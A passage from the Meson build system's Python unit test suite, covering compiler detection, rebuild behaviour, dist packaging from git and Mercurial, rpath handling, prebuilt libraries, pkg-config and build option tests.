evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertRebuiltTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertRebuiltTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
if is_windows() or platform.machine().lower() != 'e2k':
# Elbrus Fortran compiler can't generate debug information
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
